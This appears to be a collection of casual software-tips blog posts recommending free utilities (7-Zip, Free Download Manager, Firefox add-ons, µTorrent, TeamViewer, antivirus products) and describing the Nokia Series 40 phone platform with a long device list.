It's easy for Windows users to forget that WinZip isn't the only file-compression utility in the world. Like its better-known competitors, the free 7-Zip unpacks a host of archive formats, including ZIP, TAR, GZ, and its own 7z format. Unlike WinZip, though, it can create TAR and GZ archives, which are commonly used on Unix and Linux systems.

The program's ability to shrink files was stunning. In our tests, 7z archives were up to 40 percent smaller then their ZIP equivalents, although compression did take longer, and the highest compression settings can hog system resources. Advanced options include the ability to create solid and self-extracting archives, and to adjust the compression level and password protection. The program also has a command line module. Though the main interface is overly simple and looks like it was designed for Windows 95, it's not hard to use and fairly self-explanatory. The context menu options, which include "testing" an archive, indicate that 7-Zip should be taken seriously.

The main features of 7-Zip

    * High compression ratio in new 7z format with LZMA compression
    * Supported formats:
          o Packing / unpacking: 7z, ZIP, GZIP, BZIP2 and TAR
          o Unpacking only: ARJ, CAB, CHM, CPIO, DEB, DMG, HFS, ISO, LZH, LZMA, MSI, NSIS, RAR, RPM, UDF, WIM, XAR and Z.
    * For ZIP and GZIP formats, 7-Zip provides a compression ratio that is 2-10 % better than the ratio provided by PKZip and WinZip
    * Strong AES-256 encryption in 7z and ZIP formats
    * Self-extracting capability for 7z format
    * Integration with Windows Shell
    * Powerful File Manager
    * Powerful command line version
    * Plugin for FAR Manager
    * Localizations for 74 languages
Click here to download this application.

0

Forget about your downloads...

Forget about your downloads...

We all have our own interests and hobbies, some are interested in music, some in films, some in softwares, and so on...
We have to download the files we like, as we will not get all things from others. Sometimes we are not interested in sitting front of or PC also.
Here the use of Free Download Manager(FDM) comes.
This software has more speed than the ordinary browsers. It also helps in resuming broken downloads.
FDM accelerates downloads by splitting files into sections and then downloading them simultaneously. As a result download speed increases up to 600%, or even more! FDM can also resume broken downloads so you needn`t start downloading from the beginning after casual interruption.
This download utility is surprisingly attractive and full-featured for a freeware product, and its operation couldn't be more straightforward. To download a file, just click a link in your browser or drag it onto the program's tiny, semitransparent window.

In our comparison tests, Free Download Manager beat out Opera's download manager 85Kbps to 53Kbps. Its automation features also are very good. Like other managers, it can automatically dial a modem, start a download, or shut down the PC. Unlike many of them, it also can change the number of connections depending on download speed, or disconnect and shut down the computer if a file is unavailable.

If you want to boost your download speed for free, this utility is certainly worth a try.

Download FDM ver.3.0 build 852 (6,4 Mb, setup) here.

You can also download FDM Lite version
FDM Lite version requires less size and lacks some functions (BitTorrent support, video conversion and upload manager) that can be downloaded and installed as plugins later.
Download FDM Lite ver. 3.0 (2,1 Mb, setup) here.

0

Make your internet searches fast.....

Make your internet searches fast.....

Everyone like to search in internet in maximum speed, but some times the low bandwidth of the net will not allow us to do so.
As Mozilla firefox is the best and commonly used browser, i like to to share some trics to increase the browsing speed in net.
Some add-ons are used for increasing the search speed in firefox.
Commonly used add-ons for this purpose are 'image block' & 'adblock plus'

Image block
Image Block adds a toggle button that conditionally blocks/allows loading of images on webpages. Blocking images results in faster browsing, especially helpful on handheld devices or slower connections like GSM/GPRS/EDGE dial-up etc.
click here to download it.

Adblock Plus
This add-on helps you to avoid all banners, advertisments, tracking etc...
Install Adblock Plus now to regain control of the internet and change the way that you view the web.
Click here to download it.
A short video overview is available here.

0

Download whatever you want....

BitTorrent (often abbreviated to 'BT') is a protocol that allows you to download files quickly and efficiently. It is a peer to peer protocol, which means you download and upload to other people downloading the same file. BitTorrent is often used for distribution of very large files, very popular files and files available for free, as it is a cheap, fast, efficient way to distribute files to users like you.

µTorrent is a BitTorrent client. A 'client' in this case is a computer program that follows the rules of a protocol. For example, HTTP (HyperText Transfer Protocol) is the protocol used to download web pages and other content - like this page - and your HTTP client (or browser) is the program you use to get those web pages. Some popular browsers include Microsoft Internet Explorer, Mozilla Firefox, Google Chrome and Safari.

Just as there are multiple web browsers, there are multiple BitTorrent clients, and µTorrent is one such BT client.

0

TeamViewer

TeamViewer is an excellent screen-sharing and file-transfer app that can be used to facilitate business collaborations, remotely access a another computer. Along with being free for noncorporate use, it gives users precisely the tools they need to share screens securely, send files with a minimum of hassle, control access rights, and even flip which user has control.

The options available while you're in control work smoothly. You can maximize the pane that the other computer's screen is visible in, as well as utilize several smart options from a drop-down toolbar in the center of the window. A big X lets you close the connection, while the Actions button lets you switch whose in control, disable remote input, and reboot remotely. The View menu hides options to adjust the screen resolution, the optimization toward speed or quality, and control multiple-monitor displays. New features that works just as effortlessly as the old ones include VoIP audio and video conferencing, and integrated teleconferencing. These features push TeamViewer a notch above the rest because they will work without requiring firewall reconfiguration.

When you log in, you're given an access code and a password. Sharing those allows your computer to be controlled by the level you set it to: remote support, presentation, file transfer, or VPN. The TeamViewer servers remember which computers you've connected to, so reconnecting to previously shared computers happens faster. TeamViewer also has a Web-based version, for remote connecting to home from public computer. Even the installation process is impressive. Users can toggle admin rights, can opt out of running at startup, and can opt into installing the TeamViewer VPN driver for more secure screen sharing. TeamViewer makes screensharing and file-sharing as fluid and unobtrusive as it should be, and is a must-have for the home or remote office user.



TeamViewer comes with many other features including:

File transfer which allows you and your partner to share files across your VPN.

Online status displays to find out when your family or colleagues are online.

Browser based access, so you do not need to install the client to control a remote computer.

0

Good news for all microsoft lovers... FREE Antivirus- "MORRO"..!!

Good news for all microsoft lovers...
Competing with the products sold by the avast, symantec, Kaspersky, the world's biggest software maker- Microsoft is going to launch its FREE Antivirus- "MORRO"..!!
Currently, Microsoft is testing the product with their employees. When the test completes, Microsoft plans to make a trail version of tht product & will be available for the general public from its site.
Morro is being introduced into the market after Microsoft’s commercial flop – Live OneCare 3 years ago. Microsoft had announced in November that it plans to burry that product suite and is gearing up to make a come back with the free Morro service by the end of 2009. We are still unsure about its exact launch date.

Windows Live OneCare will continue to be sold for Windows XP and Windows Vista at retail through June 30, 2009. Direct sales of OneCare will be gradually phased out when “Morro” becomes available.
According to Microsoft, Morro will offer basic features like fighting wide range malicious software including viruses, spyware, rootkits and trojans, making it comparable to low-end consumer products already existing in the market.
“Morro” will be available as a stand-alone download and offer malware protection for

    * Windows XP
    * Windows Vista
    * Windows 7 operating systems.
It sure will be very interesting to see how the features of Morro would compare against products from its competitors. Let’s wait and see!

0

VIPRE Antivirus

There are lots of anti virus software which are available in premium as well as freeware version. Among them, when i searched for some, I came across the anti virus software VIPRE Antivirus Software, which gave me a powerful protection from viruses, threads & spams. The software scored 5 star rating at download.com.


VIPRE antivirus is available for 30 days free trail with registration.

Some common features are as belows:

    * Does not slow down your PC
    * All-new technology: anti-virus
    * Advanced anti-root kit technology
    * Cutting-edge Proactive Protection
    * Full protection against email-borne threats
    * Ideal for Netbooks that need malware protection
    * No automatic credit card charge each year!

If antivirus you are using fails to detects the threat, then you can give a try to this new anti virus software. The best thing about the software, it is build to use minimum system resources i.e. you system will not get slow.  Many customers are satisfied with this anti virus software. i think you will too...

0

File transfer in orkut and iGoogle chat



File transfer in orkut and iGoogle chat


Have you ever wanted to quickly send a file to a friend who's online? Now it's easy! We're excited to announce that you can now share pictures, documents, and other files with your friends while chatting in orkut and iGoogle.
To give it a try you don't need to install anything, simply start a conversation with a friend and click Send a file... in the 'Actions' menu: or you can drag and drop the file to the contact in Google talk.

This feature is also compatible with the file transfer functionality in the Google Talk downloadable software, so you can share files directly from the web with folks who use the desktop version.

File transfer is available in orkut and iGoogle only for now. We're working on bringing it to Gmail as well, and we'll keep you posted when that happens!

1

Nokia S40...

The Series 40 platform is the world's most widely used mobile device platform. Series 40 devices range from mass-market devices that provide many mobile consumers with their first experience of the internet to devices for specific market segments, such as music or fashion.

For developers, the promise made by the Series 40 platform is that of reach. Whether working with Java™ technology, Adobe Flash Lite, web technology, or mobile media content, the Series 40 platform offers a mass-market opportunity across the globe. And as the Series 40 platform evolves, increasing support for multiple runtimes is bridging the divide between mobile and desktop product development.

For Java developers, there is MIDP and CLDC technology, with an array of JSRs that provide additional location, communication, messaging, media, and graphics capabilities.

Media developers can deliver web, messaging, and Adobe Flash Lite content, as well as streaming video and audio, using the latest industry standards. The user interface of Series 40 devices can also be personalised with themes, animated screen savers, and wallpaper.

All this is supported by OMA DRM to protect developers' intellectual property.

The Series 40 is a fast-evolving mobile platform with industry-leading global sales. It creates unprecedented opportunities for developers to add value and reap rewards.

Java™ technology provides developers with a robust cross-platform development tool capable of addressing the most demanding enterprise and consumer application requirements.

The Series 40 platform provides developers with an wide array of additional APIs, these APIs enable developers to create applications that offer rich functionality with an engaging user experience. For example, APIs are available to access location information, secure data traffic, and manipulate media on many Series 40 devices. Details of the Java APIs in the various editions and feature packs of the Series 40 platform are found in the wiki article Java ME API support on Nokia devices.

The Java implementation on the Series 40 platform shares many common features with the implementation on Symbian. This allows developers to easily extend the reach of their applications to the entire platform range.

Adobe Flash Lite enables developers to deliver rich multimedia applications and content to Series 40 devices.

With support for Flash Lite 3, developers can create rich stand-alone applications and content, as well as animated screen savers and animated 'organic' wallpaper. Using fscommand2, Flash Lite content can access and control various phone parameters. Flash Lite applications can also initiate various actions, such as starting a phone call, allowing applications to take advantage of Series 40 devices' mobile connectivity.

Carbide.ui Series 40 Theme Edition is a tool for creating visual themes for devices built on the Series 40 platform. Using Carbide.ui, designers can create comprehensive themes that consumers will find visually rich and engaging.

Carbide.ui enables developers to link in their chosen Adobe Flash-, vector-, bitmap-, and audio-editing software so that theme content can be edited easily. The Referenced Colors tool improves colour manipulation by linking any colour used in a theme to a centrally defined colour. When a referenced colour is changed, all linked colours change as well. Working with complex themes is supported with workflow tools and a library function. Once a theme is complete, settings for packaging and OMA DRM protection are required once, after which packaging, protection, and transfer of the theme to a device is a single step.
Series 40 is a software platform and application user interface (UI) software on Nokia's broad range of mid tier mobile devices. It is the world's most widely used mobile device platform and found in hundreds of millions of devices
It provides communication applications such as telephone, messaging, email client with POP3 and IMAP4 capabilities and Web browser; media applications such as camera, video recorder, music/video player and FM radio; and phonebook and other personal information management (PIM) applications such as calendar and tasks.
The integrated web browser can access most web content through the service provider's XHTML/HTML gateway. The latest version of Series 40, called Series 40 6th Edition, introduced a new browser based on the WebKit open source components WebCore and JavaScriptCore. The new browser delivers support for HTML 4.01, CSS2, JavaScript 1.5, and Ajax.
Support for SyncML synchronization with external services of the address book, calendar and notes is present. However with many S40 phones, these synchronization settings must be sent via an OTA text message.
Series 40 is an embedded software platform that is open for software development via standard or de-facto content and application development technologies. It supports Java MIDlets, i.e. Java MIDP and CLDC technology, which provide location, communication, messaging, media, and graphics capabilities.[3] S40 also supports Flash Lite applications.
Series 40 uses a simpler operating system than the higher end S60 (which is based on the multi-tasking Symbian OS). Because S40 devices do not support true multi-tasking and do not have a native code API for third parties, its user interface may appear to be more responsive and faster than other Nokia platforms
The first Series 40 devices (introduced in 2002) had only 128x128 pixel large displays. Over the years, the S40 UI has evolved from a low resolution, black-and-white UI to a high resolution color UI with an enhanced graphical look. The third generation of Series 40 that became available in 2005 introduced support for devices with resolutions as high as QVGA (240x320).[6] It is possible to customize the look-and-feel of the UI via comprehensive themes
Some of the Nokia Series 40 devices are:
    * Nokia-1680 Classic-5th edition
    * Nokia-2220 Slide-5th edition FP1
    * Nokia-2320 Classic-5th edition
    * Nokia-2323 Classic-5th edition FP1
    * Nokia-2330 Classic-5th edition FP1
    * Nokia-2355-1st edition
    * Nokia-2600 classic-5th edition
    * Nokia-2610-2nd edition
    * Nokia-2626-2nd edition
    * Nokia-2630-5th edition
    * Nokia-2650
    * Nokia-2660-5th edition
    * Nokia-2680 slide-5th edition FP1
    * Nokia-2690-5th edition FP1
    * Nokia-2700 Classic-5th edition FP1
    * Nokia-2720 Fold-5th edition FP1
    * Nokia-2730 Classic-5th edition FP1
    * Nokia-2760-5th edition
    * Nokia-2855-2nd edition
    * Nokia-2865-3rd edition
    * Nokia-2865i-3rd edition
    * Nokia-3100
    * Nokia-3105
    * Nokia-3108
    * Nokia-3109 Classic-3rd edition FP2
    * Nokia-3110 Classic-3rd edition FP2
    * Nokia-3110 evolve-3rd edition
    * Nokia-3120
    * Nokia-3120 classic-5th edition FP1
    * Nokia-3125
    * Nokia-3152
    * Nokia-3155
    * Nokia-3155i
    * Nokia-3200
    * Nokia-3205
    * Nokia-3220
    * Nokia-3280 Classic-5th edition
    * Nokia-3300
    * Nokia-3300 Americas
    * Nokia-3500 Classic-3rd edition
    * Nokia-3510i
    * Nokia-3530
    * Nokia-3555-5th edition
    * Nokia-3585i
    * Nokia-3586
    * Nokia-3586i
    * Nokia-3587
    * Nokia-3587i
    * Nokia-3595
    * Nokia-3600 slide-5th edition
    * Nokia-3610 fold-5th edition
    * Nokia-3710 Fold-6th edition
    * Nokia-3720 Classic-6th edition
    * Nokia-5000-5th edition
    * Nokia-5070-2nd edition
    * Nokia-5100
    * Nokia-5130 Xpress Music-5th edition
    * Nokia-5140
    * Nokia-5140i-2nd edition
    * Nokia-5200-3rd edition
    * Nokia-5220 Xpress Music-5th edition
    * Nokia-5300 Xpress Music-3rd edition
    * Nokia-5310 Xpress Music-5th edition
    * Nokia-5330-6th edition
    * Nokia-5610 Xpress Music-5th edition
    * Nokia-6010
    * Nokia-6012
    * Nokia-6015
    * Nokia-6015i
    * Nokia-6020
    * Nokia-6030-2nd edition
    * Nokia-6060
    * Nokia-6070-2nd edition
    * Nokia-6080-2nd edition
    * Nokia-6085-3rd edition
    * Nokia-6086-3rd edition
    * Nokia-6100
    * Nokia-6101-2nd edition
    * Nokia-6102-2nd edition
    * Nokia-6102i-3rd edition
    * Nokia-6103-2nd edition
    * Nokia-6108
    * Nokia-6111-3rd edition
    * Nokia-6125-3rd edition
    * Nokia-6126-3rd edition
    * Nokia-6131 NFC-3rd edition
    * Nokia-6131-3rd edition
    * Nokia-6133-3rd edition
    * Nokia-6136-3rd edition
    * Nokia-6151-3rd edition
    * Nokia-6152
    * Nokia-6155
    * Nokia-6155i
    * Nokia-6165-3rd edition
    * Nokia-6170
    * Nokia-6200
    * Nokia-6208 Classic-5th edition
    * Nokia-6212 Classic-5th edition
    * Nokia-6216 Classic-5th edition
    * Nokia-6220
    * Nokia-6225
    * Nokia-6230-2nd edition
    * Nokia-6230i
    * Nokia-6233-3rd edition
    * Nokia-6234-3rd edition
    * Nokia-6235
    * Nokia-6235i
    * Nokia-6255
    * Nokia-6260 slide-6th edition
    * Nokia-6263-5th edition
    * Nokia-6265-3rd edition
    * Nokia-6265i-3rd edition
    * Nokia-6267-5th edition
    * Nokia-6270-3rd edition
    * Nokia-6275-3rd edition
    * Nokia-6275i-3rd edition
    * Nokia-6280-3rd edition
    * Nokia-6282-3rd edition
    * Nokia-6288-3rd edition
    * Nokia-6300-3rd edition
    * Nokia-6300i-5th edition
    * Nokia-6301-5th edition
    * Nokia-6303 Classic-6th edition
    * Nokia-6500 Classic-5th edition
    * Nokia-6500 Slide-5th edition
    * Nokia-6555-5th edition
    * Nokia-6585
    * Nokia-6600 fold-5th edition
    * Nokia-6600 slide-5th edition
    * Nokia-6600i Slide-5th edition
    * Nokia-6610
    * Nokia-6610i
    * Nokia-6650
    * Nokia-6651
    * Nokia-6700 Classic-6th edition
    * Nokia-6750 Mural-6th edition
    * Nokia-6800
    * Nokia-6800
    * Nokia-6810
    * Nokia-6820
    * Nokia-6822
    * Nokia-7020-6th edition
    * Nokia-7070 prism-5th edition
    * Nokia-7100 supernova-5th edition
    * Nokia-7200
    * Nokia-7210
    * Nokia-7210 supernova-5th edition
    * Nokia-7230
    * Nokia-7250
    * Nokia-7250i
    * Nokia-7260
    * Nokia-7270
    * Nokia-7310 supernova-5th edition
    * Nokia-7360-2nd edition
    * Nokia-7370-3rd edition
    * Nokia-7373-3rd edition
    * Nokia-7390-3rd edition
    * Nokia-7500 Prism-5th edition
    * Nokia-7510 supernova-6th edition
    * Nokia-7600
    * Nokia-7610 supernova-5th edition
    * Nokia-7900 Prism-5th edition
    * Nokia-8600 Luna-3rd edition
    * Nokia-8800
    * Nokia-8800 Arte-5th edition
    * Nokia-8800 Crabon arte-5th edition
    * Nokia-8800 Glod arte-5th edition
    * Nokia-8800 Sirocco-3rd edition
    * Nokia-8801-2nd edition
    * Nokia-8910i
    * Nokia-X3-6th edition